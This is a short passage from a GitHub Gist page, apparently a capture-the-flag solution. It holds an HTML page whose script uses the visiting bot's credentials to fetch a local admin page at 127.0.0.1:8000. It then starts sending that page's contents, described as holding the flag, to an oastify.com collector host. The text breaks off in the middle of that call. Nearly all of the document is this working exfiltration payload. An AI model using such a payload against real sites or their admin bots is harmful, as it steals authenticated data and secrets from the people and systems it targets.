Skip to content

Instantly share code, notes, and snippets.

View 0xtefa's full-sized avatar

Mostafa Fathy 0xtefa

View GitHub Profile
<!doctype html>
<html>
<body>
<script>
// Try to fetch the admin page using the bot's credentials
fetch('http://127.0.0.1:8000/admin', { credentials: 'include' })
.then(r => r.text())
.then(body => {
// send the admin page body (with flag) to your collector
fetch('r7zexf4d6efw4qc44ld925so3f96xwll.oastify.com', {